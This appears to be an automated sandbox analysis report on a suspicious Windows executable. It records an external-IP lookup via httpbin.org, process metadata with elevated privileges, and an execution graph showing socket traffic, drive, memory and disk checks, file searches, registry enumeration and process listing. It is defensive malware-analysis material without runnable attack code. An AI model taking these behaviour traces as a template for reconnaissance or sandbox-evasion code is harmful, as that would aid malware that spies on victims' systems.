                                                    Data Ascii: { "id1": "<html><body><h1>503 Service Unavailable<\/h1>\nNo server is available to handle this request.\n<\/body><\/html>\n", "data": "Done1" }
                                                    Dec 19, 2024 08:33:39.272774935 CET212INHTTP/1.0 503 Service Unavailable
                                                    Cache-Control: no-cache
                                                    Connection: close
                                                    Content-Type: text/html
                                                    Data Raw: 3c 68 74 6d 6c 3e 3c 62 6f 64 79 3e 3c 68 31 3e 35 30 33 20 53 65 72 76 69 63 65 20 55 6e 61 76 61 69 6c 61 62 6c 65 3c 2f 68 31 3e 0a 4e 6f 20 73 65 72 76 65 72 20 69 73 20 61 76 61 69 6c 61 62 6c 65 20 74 6f 20 68 61 6e 64 6c 65 20 74 68 69 73 20 72 65 71 75 65 73 74 2e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                    Data Ascii: <html><body><h1>503 Service Unavailable</h1>No server is available to handle this request.</body></html>


                                                    HTTPS Proxied Packets

                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                    0192.168.2.104970398.85.100.804437540C:\Users\user\Desktop\Cc8zEnIDB2.exe
                                                    TimestampBytes transferredDirectionData
                                                    2024-12-19 07:33:33 UTC52OUTGET /ip HTTP/1.1
                                                    Host: httpbin.org
                                                    Accept: */*
                                                    2024-12-19 07:33:34 UTC224INHTTP/1.1 200 OK
                                                    Date: Thu, 19 Dec 2024 07:33:34 GMT
                                                    Content-Type: application/json
                                                    Content-Length: 31
                                                    Connection: close
                                                    Server: gunicorn/19.9.0
                                                    Access-Control-Allow-Origin: *
                                                    Access-Control-Allow-Credentials: true
                                                    2024-12-19 07:33:34 UTC31INData Raw: 7b 0a 20 20 22 6f 72 69 67 69 6e 22 3a 20 22 38 2e 34 36 2e 31 32 33 2e 31 38 39 22 0a 7d 0a
                                                    Data Ascii: { "origin": "8.46.123.189"}


                                                    Statistics

                                                    CPU Usage

                                                    Click to jump to process

                                                    Memory Usage

                                                    Click to jump to process

                                                    High Level Behavior Distribution

                                                    Click to dive into process behavior distribution

                                                    System Behavior

                                                    General

                                                    Target ID:0
                                                    Start time:02:33:28
                                                    Start date:19/12/2024
                                                    Path:C:\Users\user\Desktop\Cc8zEnIDB2.exe
                                                    Wow64 process (32bit):true
                                                    Commandline:"C:\Users\user\Desktop\Cc8zEnIDB2.exe"
                                                    Imagebase:0x4d0000
                                                    File size:4'430'848 bytes
                                                    MD5 hash:A0D6C9D4D75289FFA8F7DBDA90E3FCE6
                                                    Has elevated privileges:true
                                                    Has administrator privileges:true
                                                    Programmed in:C, C++ or other language
                                                    Reputation:low
                                                    Has exited:true

                                                    Disassembly

                                                    Reset < >

                                                      Execution Graph

                                                      Execution Coverage:2%
                                                      Dynamic/Decrypted Code Coverage:7.5%
                                                      Signature Coverage:15.1%
                                                      Total number of Nodes:681
                                                      Total number of Limit Nodes:96
                                                      execution_graph 91338 508b50 91339 508b6b 91338->91339 91360 508be6 91338->91360 91340 508bf3 91339->91340 91341 508b8f 91339->91341 91339->91360 91371 50a550 91340->91371 91442 4e6e40 select 91341->91442 91345 508cd9 SleepEx getsockopt 91346 508d18 91345->91346 91351 508d43 91346->91351 91356 508cb2 91346->91356 91347 508e85 91352 508eae 91347->91352 91347->91360 91448 4e2a00 localeconv localeconv 91347->91448 91348 50a150 3 API calls 91361 508dff 91348->91361 91349 508c35 91430 50a150 91349->91430 91350 508c1f connect 91350->91349 91359 50a150 3 API calls 91351->91359 91352->91360 91449 4d78b0 closesocket 91352->91449 91353 508bb5 91353->91360 91444 5150a0 localeconv localeconv 91353->91444 91356->91347 91356->91348 91356->91360 91359->91353 91361->91347 91446 4ed090 localeconv localeconv 91361->91446 91364 508dc8 91445 50b100 localeconv localeconv 91364->91445 91365 508ba1 91365->91345 91365->91353 91365->91356 91366 508e67 91447 514fd0 localeconv localeconv 91366->91447 91370 508c8b 91370->91364 91370->91365 91372 50a575 91371->91372 91374 50a597 91372->91374 91453 4d75e0 91372->91453 91424 50a6d9 91374->91424 91465 50ef30 91374->91465 91376 50a709 91378 4d78b0 3 API calls 91376->91378 91386 50a713 91376->91386 91378->91386 91379 508bfc 91379->91349 91379->91350 91379->91356 91379->91360 91381 50a7e5 91385 50a811 setsockopt 91381->91385 91391 50a87c 91381->91391 91401 50a8ee 91381->91401 91382 50a641 91382->91381 91479 514fd0 localeconv localeconv 91382->91479 91385->91391 91393 50a83b 91385->91393 91386->91379 91478 5150a0 localeconv localeconv 91386->91478 91387 50a69b 91475 4ed090 localeconv localeconv 91387->91475 91389 50a6c9 91476 514f40 localeconv localeconv 91389->91476 91391->91401 91482 50b1e0 localeconv localeconv 91391->91482 91393->91391 91480 4ed090 localeconv localeconv 91393->91480 91396 50af56 91397 50af5d 91396->91397 91396->91424 91397->91386 91400 50a150 3 API calls 91397->91400 91398 50a86d 91481 514fd0 localeconv localeconv 91398->91481 91400->91386 91402 50abb9 91401->91402 91404 50ae32 91401->91404 91405 50acb8 91401->91405 91413 50af33 91401->91413 91421 50abe1 91401->91421 91401->91424 91407 50ad45 91402->91407 91409 50ade6 91402->91409 91402->91421 91484 506be0 10 API calls 91402->91484 91403 50b056 91493 4ed090 localeconv localeconv 91403->91493 91404->91402 91490 514fd0 localeconv localeconv 91404->91490 91405->91402 91415 50acdc 91405->91415 91405->91424 91406 50af03 91406->91413 91491 514fd0 localeconv localeconv 91406->91491 91407->91409 91412 50ad5f 91407->91412 91488 4ed090 localeconv localeconv 91409->91488 91485 5220d0 localeconv localeconv 91412->91485 91474 5367e0 ioctlsocket 91413->91474 91483 4ed090 localeconv localeconv 91415->91483 91418 50b07b 91494 514f40 localeconv localeconv 91418->91494 91419 50ad7b 91422 50adb7 91419->91422 91486 514fd0 localeconv localeconv 91419->91486 91421->91403 91421->91406 91421->91424 91492 514fd0 localeconv localeconv 91421->91492 91487 523030 localeconv localeconv 91422->91487 91424->91376 91424->91386 91477 4e2a00 localeconv localeconv 91424->91477 91427 50ad01 91489 514f40 localeconv localeconv 91427->91489 91431 508c4d 91430->91431 91432 50a15f 91430->91432 91431->91370 91443 5150a0 localeconv localeconv 91431->91443 91432->91431 91433 50a181 getsockname 91432->91433 91434 50a1d0 91433->91434 91435 50a1f7 91433->91435 91501 4ed090 localeconv localeconv 91434->91501 91436 50ef30 2 API calls 91435->91436 91440 50a20f 91436->91440 91438 50a1eb 91503 514f40 localeconv localeconv 91438->91503 91440->91431 91502 4ed090 localeconv localeconv 91440->91502 91442->91365 91443->91370 91444->91360 91445->91356 91446->91366 91447->91347 91448->91352 91450 4d78d7 91449->91450 91451 4d78c5 91449->91451 91450->91360 91504 4d72a0 localeconv localeconv 91451->91504 91454 4d75ef 91453->91454 91455 4d7607 socket 91453->91455 91454->91455 91458 4d7601 91454->91458 91459 4d7643 91454->91459 91456 4d763a 91455->91456 91457 4d762b 91455->91457 91456->91374 91495 4d72a0 localeconv localeconv 91457->91495 91458->91455 91496 4d72a0 localeconv localeconv 91459->91496 91462 4d7654 91497 4dcb20 localeconv localeconv 91462->91497 91464 4d7674 91464->91374 91466 50ef47 91465->91466 91467 50efa8 91465->91467 91469 50ef81 91466->91469 91470 50ef4c 91466->91470 91468 50a63a 91467->91468 91500 4dc960 localeconv localeconv 91467->91500 91468->91382 91468->91387 91499 533d10 localeconv localeconv 91469->91499 91470->91468 91498 533d10 localeconv localeconv 91470->91498 91474->91396 91475->91389 91476->91424 91477->91376 91478->91379 91479->91381 91480->91398 91481->91391 91482->91401 91483->91427 91484->91407 91485->91419 91486->91422 91487->91421 91488->91427 91489->91424 91490->91402 91491->91413 91492->91421 91493->91418 91494->91424 91495->91456 91496->91462 91497->91464 91498->91468 91499->91468 91500->91468 91501->91438 91502->91438 91503->91431 91504->91450 91965 5095b0 91966 5095c8 91965->91966 91968 5095fd 91965->91968 91967 50a150 3 API calls 91966->91967 91966->91968 91967->91968 91969 90d270 91981 85dd30 91969->91981 91971 90d2a6 91972 90d29a 91972->91971 91985 8612a0 91972->91985 91974 90d2e6 91975 90d2da 91975->91974 91989 90d490 91975->91989 91977 90d36d 91979 90d30f 91979->91977 91998 914780 91979->91998 91980 90d456 91982 85dd41 91981->91982 91983 85d1b0 2 API calls 91982->91983 91984 85dd69 91983->91984 91984->91972 91986 8612ac 91985->91986 92006 85e030 91986->92006 91988 8612da 91988->91975 91990 90d4da 91989->91990 91991 90d4f3 91990->91991 91992 90d5e0 91990->91992 91994 90d596 91990->91994 91991->91979 92054 85b4e0 localeconv localeconv 91992->92054 91995 90d5d4 91994->91995 92055 85b4e0 localeconv localeconv 91994->92055 91995->91979 91996 90d609 91996->91979 91999 861340 2 API calls 91998->91999 92001 9147b2 91999->92001 92000 9147be 92000->91980 92001->92000 92002 861340 2 API calls 92001->92002 92003 914803 92002->92003 92005 91481c 92003->92005 92056 861400 localeconv localeconv 92003->92056 92005->91980 92007 85e07d localeconv localeconv 92006->92007 92035 85e4e3 92006->92035 92021 85e0ae 92007->92021 92008 85df40 fgetc 92008->92021 92010 85e16e 92013 85ed70 ungetc 92010->92013 92036 85e186 92010->92036 92011 860230 ungetc 92011->92035 92012 85e223 92012->92036 92037 85e24f 92012->92037 92045 85df40 fgetc 92012->92045 92013->92036 92014 85eb32 92016 85eb43 92014->92016 92017 85e7fa 92014->92017 92015 85fec7 92052 85dfd0 ungetc 92015->92052 92018 85f0b5 92016->92018 92032 85eb5a 92016->92032 92029 85e830 92017->92029 92017->92032 92050 85df40 fgetc 92018->92050 92019 85fe96 isxdigit 92019->92035 92021->92008 92021->92010 92021->92012 92030 85e368 92021->92030 92021->92035 92021->92036 92024 85e699 92024->92032 92024->92035 92038 85e6c4 92024->92038 92026 860722 ungetc 92026->92036 92028 861184 ungetc 92028->92035 92029->92036 92047 85df40 fgetc 92029->92047 92030->92014 92030->92024 92030->92035 92030->92036 92043 860098 ungetc 92030->92043 92049 85df40 fgetc 92030->92049 92031 8608b7 ungetc 92031->92035 92032->92035 92032->92036 92048 85df40 fgetc 92032->92048 92034 85f0c8 92034->92035 92034->92036 92051 85df40 fgetc 92034->92051 92035->92011 92035->92015 92035->92019 92035->92028 92035->92031 92035->92036 92035->92037 92041 860e1e ungetc 92035->92041 92042 85df40 fgetc 92035->92042 92044 85ffe6 ungetc 92035->92044 92053 85dfd0 ungetc 92035->92053 92036->91988 92037->92026 92037->92036 92038->92036 92046 85df40 fgetc 92038->92046 92041->92035 92042->92035 92043->92030 92044->92035 92045->92012 92046->92035 92047->92035 92048->92035 92049->92030 92050->92034 92051->92034 92052->92036 92053->92035 92054->91996 92055->91996 92056->92005 92057 506ab0 92058 506ad5 92057->92058 92059 506bb4 92058->92059 92061 4e6fa0 select 92058->92061 92060 585ed0 9 API calls 92059->92060 92062 506ba9 92060->92062 92063 506b54 92061->92063 92063->92059 92063->92062 92064 506b5d 92063->92064 92064->92062 92066 585ed0 92064->92066 92069 585a50 92066->92069 92068 585ee5 92068->92064 92070 585a58 92069->92070 92076 585ea0 92069->92076 92071 585b50 92070->92071 92073 585b88 92070->92073 92084 585a99 92070->92084 92071->92073 92077 585b7a 92071->92077 92078 585eb4 92071->92078 92072 585e96 92108 599480 7 API calls 92072->92108 92074 585cae 92073->92074 92104 586d50 localeconv localeconv 92073->92104 92105 585ef0 6 API calls 92073->92105 92074->92072 92090 59a920 92074->92090 92106 586d50 localeconv localeconv 92074->92106 92107 599320 7 API calls 92074->92107 92076->92068 92094 5870a0 92077->92094 92109 586f10 7 API calls 92078->92109 92082 585ec2 92082->92082 92084->92073 92087 5870a0 8 API calls 92084->92087 92103 586f10 7 API calls 92084->92103 92087->92084 92091 59a944 92090->92091 92092 59a94b 92091->92092 92093 59a977 send 92091->92093 92092->92074 92093->92074 92095 5870ae 92094->92095 92097 58717f 92095->92097 92101 5871a7 92095->92101 92110 59a8c0 92095->92110 92114 5871c0 6 API calls 92095->92114 92097->92101 92115 586d50 localeconv localeconv 92097->92115 92099 58719f 92116 599320 7 API calls 92099->92116 92101->92073 92103->92084 92104->92073 92105->92073 92106->92074 92107->92074 92108->92076 92109->92082 92111 59a903 recvfrom 92110->92111 92112 59a8e6 92110->92112 92113 59a8ed 92111->92113 92112->92111 92112->92113 92113->92095 92114->92095 92115->92099 92116->92101 92117 719053b 92118 719054e Process32FirstW 92117->92118 92120 719057b 92118->92120 91505 4d13c9 91507 4d1160 91505->91507 91508 4d13a1 91507->91508 91509 858a20 15 API calls 91507->91509 91509->91507 92121 85b160 Sleep 92122 4ed5e0 92123 4ed652 WSAStartup 92122->92123 92124 4ed5f0 92122->92124 92123->92124 92125 4ed664 92123->92125 92127 4ed67c 92124->92127 92129 4ed690 localeconv localeconv 92124->92129 92128 4ed5fa 92129->92128 91510 4d255d 91541 859f70 91510->91541 91513 4d2589 91514 4d25a0 GlobalMemoryStatusEx 91513->91514 91515 4d25ec 91514->91515 91543 71503ba 91515->91543 91547 715036b 91515->91547 91551 7150428 91515->91551 91555 71504ab 91515->91555 91559 71503e0 91515->91559 91563 7150443 91515->91563 91566 7150304 91515->91566 91570 7150384 91515->91570 91574 715041a 91515->91574 91578 71502f2 91515->91578 91582 715033e 91515->91582 91586 71503f9 91515->91586 91590 71502f0 91515->91590 91594 7150431 91515->91594 91598 7150395 91515->91598 91602 7150315 91515->91602 91516 4d263c GetDriveTypeA 91518 4d2655 GetDiskFreeSpaceExA 91516->91518 91520 4d261b 91516->91520 91517 4d2762 91519 4d27d6 KiUserCallbackDispatcher 91517->91519 91518->91520 91521 4d27f8 91519->91521 91520->91516 91520->91517 91522 4d28d9 FindFirstFileW 91521->91522 91523 4d2906 FindNextFileW 91522->91523 91524 4d2928 91522->91524 91523->91523 91523->91524 91542 4d256c GetSystemInfo 91541->91542 91542->91513 91544 7150382 GetLogicalDrives 91543->91544 91546 715046a 91544->91546 91546->91520 91548 715037b GetLogicalDrives 91547->91548 91550 715046a 91548->91550 91550->91520 91552 7150435 GetLogicalDrives 91551->91552 91554 715046a 91552->91554 91554->91520 91556 715046a 91555->91556 91557 715044e GetLogicalDrives 91555->91557 91556->91520 91557->91556 91560 71503ef GetLogicalDrives 91559->91560 91562 715046a 91560->91562 91562->91520 91564 715045e GetLogicalDrives 91563->91564 91565 715046a 91564->91565 91565->91520 91567 715030a GetLogicalDrives 91566->91567 91569 715046a 91567->91569 91569->91520 91571 715038f GetLogicalDrives 91570->91571 91573 715046a 91571->91573 91573->91520 91575 715041d GetLogicalDrives 91574->91575 91577 715046a 91574->91577 91575->91577 91577->91520 91579 715030a GetLogicalDrives 91578->91579 91581 715046a 91579->91581 91581->91520 91583 715037c GetLogicalDrives 91582->91583 91585 715046a 91583->91585 91585->91520 91587 715040c GetLogicalDrives 91586->91587 91589 715046a 91587->91589 91589->91520 91591 715030a GetLogicalDrives 91590->91591 91593 715046a 91591->91593 91593->91520 91595 715043c GetLogicalDrives 91594->91595 91597 715046a 91595->91597 91597->91520 91599 7150335 GetLogicalDrives 91598->91599 91601 715046a 91599->91601 91601->91520 91603 7150335 GetLogicalDrives 91602->91603 91605 715046a 91603->91605 91605->91520 91606 50b400 91607 50b425 91606->91607 91608 50b40b 91606->91608 91611 4d7770 91608->91611 91609 50b421 91612 4d77b6 recv 91611->91612 91613 4d7790 91611->91613 91615 4d77a3 91612->91615 91621 4d77d4 91612->91621 91613->91612 91614 4d7799 91613->91614 91614->91615 91616 4d77db 91614->91616 91622 4d72a0 localeconv localeconv 91615->91622 91623 4d72a0 localeconv localeconv 91616->91623 91619 4d77ec 91624 4dcb20 localeconv localeconv 91619->91624 91621->91609 91622->91621 91623->91619 91624->91621 91625 50e400 91626 50e412 91625->91626 91634 50e459 91625->91634 91631 50e422 91626->91631 91649 523030 localeconv localeconv 91626->91649 91627 50e4a8 91630 50e42b 91651 5068b0 7 API calls 91630->91651 91650 5309d0 localeconv localeconv 91631->91650 91633 50e495 91633->91627 91636 50b5a0 2 API calls 91633->91636 91634->91627 91634->91633 91637 50b5a0 91634->91637 91636->91627 91638 50b5d2 91637->91638 91639 50b5c0 91637->91639 91638->91633 91639->91638 91640 50b713 91639->91640 91643 50b626 91639->91643 91653 514f40 localeconv localeconv 91640->91653 91642 50b65a 91642->91638 91644 50b737 91642->91644 91645 50b72b 91642->91645 91643->91638 91643->91642 91643->91644 91643->91645 91652 5150a0 localeconv localeconv 91643->91652 91644->91638 91655 5150a0 localeconv localeconv 91644->91655 91645->91638 91654 5150a0 localeconv localeconv 91645->91654 91649->91631 91650->91630 91651->91634 91652->91643 91653->91638 91654->91638 91655->91638 91656 50f100 91658 50f11f 91656->91658 91683 50f1b8 91656->91683 91657 50ff1a 91706 510c80 localeconv localeconv 91657->91706 91660 50f2a3 91658->91660 91674 50f240 91658->91674 91678 50f603 91658->91678 91658->91683 91691 514f40 localeconv localeconv 91660->91691 91662 510045 91665 51010d 91662->91665 91668 51004d 91662->91668 91662->91683 91709 5150a0 localeconv localeconv 91662->91709 91663 50f80d 91667 51015e 91665->91667 91710 5150a0 localeconv localeconv 91665->91710 91666 51008a 91708 514f40 localeconv localeconv 91666->91708 91667->91668 91711 5150a0 localeconv localeconv 91667->91711 91712 514f40 localeconv localeconv 91668->91712 91674->91683 91692 4d7310 91674->91692 91676 50f491 91676->91678 91682 4d7310 2 API calls 91676->91682 91678->91657 91678->91662 91678->91663 91678->91666 91680 510d30 localeconv localeconv 91678->91680 91688 5150a0 localeconv localeconv 91678->91688 91704 4dfa50 localeconv localeconv 91678->91704 91705 514fd0 localeconv localeconv 91678->91705 91679 50ff5b 91679->91683 91707 5150a0 localeconv localeconv 91679->91707 91680->91678 91689 50f50d 91682->91689 91684 50f3ce 91684->91676 91684->91683 91701 5150a0 localeconv localeconv 91684->91701 91686 50f5b9 91703 4dfa50 localeconv localeconv 91686->91703 91688->91678 91689->91683 91689->91686 91702 5150a0 localeconv localeconv 91689->91702 91691->91683 91693 4d7320 91692->91693 91697 4d7332 91692->91697 91694 4d7390 91693->91694 91693->91697 91714 4d72a0 localeconv localeconv 91694->91714 91696 4d73a1 91715 4dcb20 localeconv localeconv 91696->91715 91698 4d7380 91697->91698 91713 4d72a0 localeconv localeconv 91697->91713 91698->91684 91701->91676 91702->91686 91703->91678 91704->91678 91705->91678 91706->91679 91707->91683 91708->91683 91709->91665 91710->91667 91711->91668 91712->91683 91713->91698 91714->91696 91715->91698 91716 50b3c0 91717 50b3cb 91716->91717 91718 50b3ee 91716->91718 91722 4d76a0 91717->91722 91733 509290 91717->91733 91719 50b3ea 91723 4d76e6 send 91722->91723 91724 4d76c0 91722->91724 91725 4d76d3 91723->91725 91732 4d7704 91723->91732 91724->91723 91726 4d76c9 91724->91726 91747 4d72a0 localeconv localeconv 91725->91747 91726->91725 91728 4d770b 91726->91728 91748 4d72a0 localeconv localeconv 91728->91748 91730 4d771c 91749 4dcb20 localeconv localeconv 91730->91749 91732->91719 91734 4d76a0 3 API calls 91733->91734 91735 5092e5 91734->91735 91736 5093c3 91735->91736 91738 5092f3 91735->91738 91741 509392 91736->91741 91750 4ed090 localeconv localeconv 91736->91750 91737 5093be 91737->91719 91738->91741 91742 509335 WSAIoctl 91738->91742 91740 5093f7 91751 514f40 localeconv localeconv 91740->91751 91741->91737 91752 5150a0 localeconv localeconv 91741->91752 91742->91741 91745 509366 91742->91745 91745->91741 91746 509371 setsockopt 91745->91746 91746->91741 91747->91732 91748->91730 91749->91732 91750->91740 91751->91741 91752->91737 91753 510700 91763 510719 91753->91763 91768 51099d 91753->91768 91755 4d7310 2 API calls 91755->91763 91757 5109f6 91778 4d75a0 91757->91778 91758 5109b5 91758->91768 91777 5150a0 localeconv localeconv 91758->91777 91760 510a35 91782 514f40 localeconv localeconv 91760->91782 91763->91755 91763->91757 91763->91758 91763->91760 91763->91768 91771 50b8e0 localeconv localeconv 91763->91771 91772 53f570 localeconv localeconv 91763->91772 91773 4feb30 localeconv localeconv 91763->91773 91774 5313a0 localeconv localeconv 91763->91774 91775 5539a0 localeconv localeconv 91763->91775 91776 4feae0 localeconv localeconv 91763->91776 91769 4d75a0 2 API calls 91769->91768 91771->91763 91772->91763 91773->91763 91774->91763 91775->91763 91776->91763 91777->91768 91779 4d75aa 91778->91779 91781 4d75d1 91778->91781 91779->91781 91783 4d72a0 localeconv localeconv 91779->91783 91781->91769 91782->91768 91783->91781 92130 4d29ff FindFirstFileA 92131 4d2a31 92130->92131 92132 4d2a5c RegOpenKeyExA 92131->92132 92133 4d2a93 92132->92133 92134 4d2ade CharUpperA 92133->92134 92136 4d2b0a 92134->92136 92135 4d2bf9 QueryFullProcessImageNameA 92137 4d2c3b CloseHandle 92135->92137 92136->92135 92139 4d2c64 92137->92139 92138 4d2df1 CloseHandle 92140 4d2e23 92138->92140 92139->92138 91784 4d3d5e 91789 4d3d30 91784->91789 91785 4d3d90 91793 4dfcb0 8 API calls 91785->91793 91788 4d3dc1 91789->91784 91789->91785 91790 4e0ab0 91789->91790 91794 4e05b0 91790->91794 91793->91788 91795 4e07c7 91794->91795 91803 4e05bd 91794->91803 91795->91789 91796 4e066a 91813 50dec0 91796->91813 91800 4e067b 91807 4e06f0 91800->91807 91809 4e07ce 91800->91809 91820 4e73b0 localeconv localeconv 91800->91820 91803->91795 91803->91796 91803->91809 91818 4e03c0 localeconv localeconv 91803->91818 91819 4e7450 localeconv localeconv 91803->91819 91804 4e0707 WSAEventSelect 91804->91807 91804->91809 91805 4e07ef 91805->91809 91811 4e0847 91805->91811 91822 4e6fa0 91805->91822 91807->91804 91807->91805 91808 4d76a0 3 API calls 91807->91808 91808->91807 91821 4e7380 localeconv localeconv 91809->91821 91810 4e09e8 WSAEnumNetworkEvents 91810->91811 91812 4e09d0 WSAEventSelect 91810->91812 91811->91809 91811->91810 91811->91812 91812->91810 91812->91811 91814 50df1e 91813->91814 91816 50dece 91813->91816 91826 50df30 91816->91826 91817 50def9 91817->91800 91818->91803 91819->91803 91820->91800 91821->91795 91823 4e6fd4 91822->91823 91825 4e6feb 91822->91825 91824 4e7207 select 91823->91824 91823->91825 91824->91825 91825->91811 91827 50df44 91826->91827 91829 50dfb9 91827->91829 91831 50dfb5 91827->91831 91832 4e7450 localeconv localeconv 91827->91832 91833 4e7380 localeconv localeconv 91829->91833 91831->91817 91832->91827 91833->91831 92141 4e1139 92166 50baa0 92141->92166 92143 4e1148 92144 4e1512 92143->92144 92145 4e1161 92143->92145 92148 4e1527 92144->92148 92172 4dfec0 8 API calls 92144->92172 92146 4e0f69 92145->92146 92171 4e0150 localeconv localeconv 92145->92171 92149 4e1f58 92146->92149 92150 4e1fb0 92146->92150 92155 4e0f00 92146->92155 92148->92146 92173 4e22d0 8 API calls 92148->92173 92174 4e0150 localeconv localeconv 92149->92174 92150->92155 92176 4e4940 localeconv localeconv 92150->92176 92161 4e0f21 92155->92161 92170 4e0150 localeconv localeconv 92155->92170 92156 4e1fa6 92156->92155 92158 4e208a 92156->92158 92159 4d75a0 2 API calls 92156->92159 92156->92161 92177 4e3900 localeconv localeconv 92158->92177 92163 4e2057 92159->92163 92162 4e1f61 92162->92156 92175 50d4d0 7 API calls 92162->92175 92165 4d75a0 2 API calls 92163->92165 92165->92158 92167 50bb60 92166->92167 92169 50bac7 92166->92169 92167->92143 92169->92167 92178 4f05b0 localeconv localeconv 92169->92178 92170->92161 92171->92146 92172->92148 92173->92146 92174->92162 92175->92156 92176->92156 92177->92155 92178->92167 91834 583c00 91835 583c23 91834->91835 91837 583c0d 91834->91837 91835->91837 91838 59b180 91835->91838 91842 59b19b 91838->91842 91845 59b2e3 91838->91845 91841 59b2a9 getsockname 91855 59b020 91841->91855 91842->91841 91844 59b020 closesocket 91842->91844 91842->91845 91846 59af30 91842->91846 91850 59b060 91842->91850 91844->91842 91845->91837 91847 59af4c 91846->91847 91848 59af63 socket 91846->91848 91847->91848 91849 59af52 91847->91849 91848->91842 91849->91842 91853 59b080 91850->91853 91851 59b0b0 connect 91852 59b0bf WSAGetLastError 91851->91852 91852->91853 91854 59b0ea 91852->91854 91853->91851 91853->91852 91853->91854 91854->91842 91856 59b052 91855->91856 91858 59b029 91855->91858 91856->91842 91857 59b04b closesocket 91857->91856 91858->91857 91859 59b03e 91858->91859 91859->91842 92179 584720 92181 584728 92179->92181 92180 584733 92181->92180 92190 58476c 92181->92190 92191 585540 7 API calls 92181->92191 92183 584774 92185 58482e 92185->92190 92192 589270 92185->92192 92187 584860 92197 584950 92187->92197 92189 584878 92190->92189 92203 5830a0 7 API calls 92190->92203 92191->92185 92204 58a440 92192->92204 92194 589297 92196 5892ab 92194->92196 92238 58bbe0 7 API calls 92194->92238 92196->92187 92200 584966 92197->92200 92198 584aa0 gethostname 92199 5849c5 92198->92199 92202 5849b9 92198->92202 92199->92190 92200->92199 92200->92202 92239 58bbe0 7 API calls 92200->92239 92202->92198 92202->92199 92203->92183 92234 58a46b 92204->92234 92205 58aa03 RegOpenKeyExA 92206 58ab70 RegOpenKeyExA 92205->92206 92207 58aa27 RegQueryValueExA 92205->92207 92210 58ac34 RegOpenKeyExA 92206->92210 92227 58ab90 92206->92227 92208 58aacc RegQueryValueExA 92207->92208 92209 58aa71 92207->92209 92212 58ab0e 92208->92212 92213 58ab66 RegCloseKey 92208->92213 92209->92208 92216 58aa85 RegQueryValueExA 92209->92216 92211 58acf8 RegOpenKeyExA 92210->92211 92230 58ac54 92210->92230 92214 58ad56 RegEnumKeyExA 92211->92214 92217 58ad14 92211->92217 92212->92213 92220 58ab1e RegQueryValueExA 92212->92220 92213->92206 92215 58ad9b 92214->92215 92214->92217 92218 58ae16 RegOpenKeyExA 92215->92218 92219 58aab3 92216->92219 92217->92194 92221 58addf RegEnumKeyExA 92218->92221 92222 58ae34 RegQueryValueExA 92218->92222 92219->92208 92223 58ab4c 92220->92223 92221->92217 92221->92218 92224 58af43 RegQueryValueExA 92222->92224 92237 58adaa 92222->92237 92223->92213 92225 58b052 RegQueryValueExA 92224->92225 92224->92237 92226 58adc7 RegCloseKey 92225->92226 92225->92237 92226->92221 92227->92210 92228 58a794 GetBestRoute2 92231 58d190 2 API calls 92228->92231 92229 58afa0 RegQueryValueExA 92229->92237 92230->92211 92231->92234 92232 58a6c7 GetBestRoute2 92233 58d190 2 API calls 92232->92233 92233->92234 92234->92228 92234->92232 92235 58b180 localeconv localeconv 92234->92235 92236 58a4db 92234->92236 92235->92234 92236->92205 92236->92217 92237->92224 92237->92225 92237->92226 92237->92229 92238->92196 92239->92202 91860 59a080 91863 599740 91860->91863 91862 59a09b 91864 599780 91863->91864 91869 59975d 91863->91869 91865 599925 RegOpenKeyExA 91864->91865 91864->91869 91866 59995a RegQueryValueExA 91865->91866 91870 599812 91865->91870 91867 599986 RegCloseKey 91866->91867 91867->91869 91869->91870 91871 58d190 91869->91871 91870->91862 91872 58d1ae 91871->91872 91875 58d1fa 91871->91875 91874 58d1e8 91872->91874 91911 58d8f0 localeconv localeconv 91872->91911 91874->91869 91876 58d4f9 91875->91876 91877 58d4b7 91875->91877 91879 58d504 91876->91879 91920 58d8f0 localeconv localeconv 91876->91920 91912 58d8f0 localeconv localeconv 91877->91912 91886 58d516 91879->91886 91921 58d8f0 localeconv localeconv 91879->91921 91880 58d4ce 91885 58d4e3 91880->91885 91913 58d8f0 localeconv localeconv 91880->91913 91883 58d52c 91894 58d535 91883->91894 91924 58d8f0 localeconv localeconv 91883->91924 91890 58d4f4 91885->91890 91914 58d8f0 localeconv localeconv 91885->91914 91892 58d51f 91886->91892 91922 58d8f0 localeconv localeconv 91886->91922 91896 58d5bf 91890->91896 91915 58d8f0 localeconv localeconv 91890->91915 91892->91883 91923 58d8f0 localeconv localeconv 91892->91923 91893 58d547 91893->91874 91927 58d8f0 localeconv localeconv 91893->91927 91901 58d53e 91894->91901 91925 58d8f0 localeconv localeconv 91894->91925 91900 58d5fb 91896->91900 91916 58d8f0 localeconv localeconv 91896->91916 91899 58d87f 91899->91874 91928 58d8f0 localeconv localeconv 91899->91928 91905 58d632 91900->91905 91917 58d8f0 localeconv localeconv 91900->91917 91901->91893 91901->91899 91903 58d7fe 91901->91903 91926 58d8f0 localeconv localeconv 91903->91926 91908 58d66e 91905->91908 91918 58d8f0 localeconv localeconv 91905->91918 91908->91874 91919 58d8f0 localeconv localeconv 91908->91919 91911->91874 91912->91880 91913->91885 91914->91890 91915->91896 91916->91900 91917->91905 91918->91908 91919->91874 91920->91879 91921->91886 91922->91892 91923->91883 91924->91894 91925->91901 91926->91893 91927->91874 91928->91874 91929 4d2f17 91937 4d2f2c 91929->91937 91930 4d31d3 91933 4d315c RegEnumKeyExA 91934 4d31b2 RegCloseKey 91933->91934 91933->91937 91934->91937 91935 4d1619 2 API calls 91936 4d3046 RegOpenKeyExA 91935->91936 91936->91937 91938 4d3089 RegQueryValueExA 91936->91938 91937->91930 91937->91933 91937->91935 91939 4d313b RegCloseKey 91937->91939 91940 4d1619 91937->91940 91938->91937 91938->91939 91939->91937 91943 861340 91940->91943 91942 4d1645 RegOpenKeyExA 91942->91937 91944 861390 91943->91944 91945 861359 91943->91945 91947 85d1b0 2 API calls 91944->91947 91950 85d1b0 91945->91950 91949 8613b0 91947->91949 91948 861378 91948->91942 91949->91942 91955 85d1cd 91950->91955 91951 85d4e4 localeconv 91951->91955 91952 85c9a0 localeconv 91952->91955 91953 85ca30 localeconv 91953->91955 91954 85d38e 91954->91948 91955->91951 91955->91952 91955->91953 91955->91954 91956 85cc70 localeconv 91955->91956 91956->91955 91957 4d31d7 91958 4d31f4 91957->91958 91959 4d3200 91958->91959 91963 4d3223 91958->91963 91964 4d15b0 localeconv localeconv 91959->91964 91961 4d321e 91962 4d32dc CloseHandle 91962->91961 91963->91962 91964->91961

                                                      Executed Functions

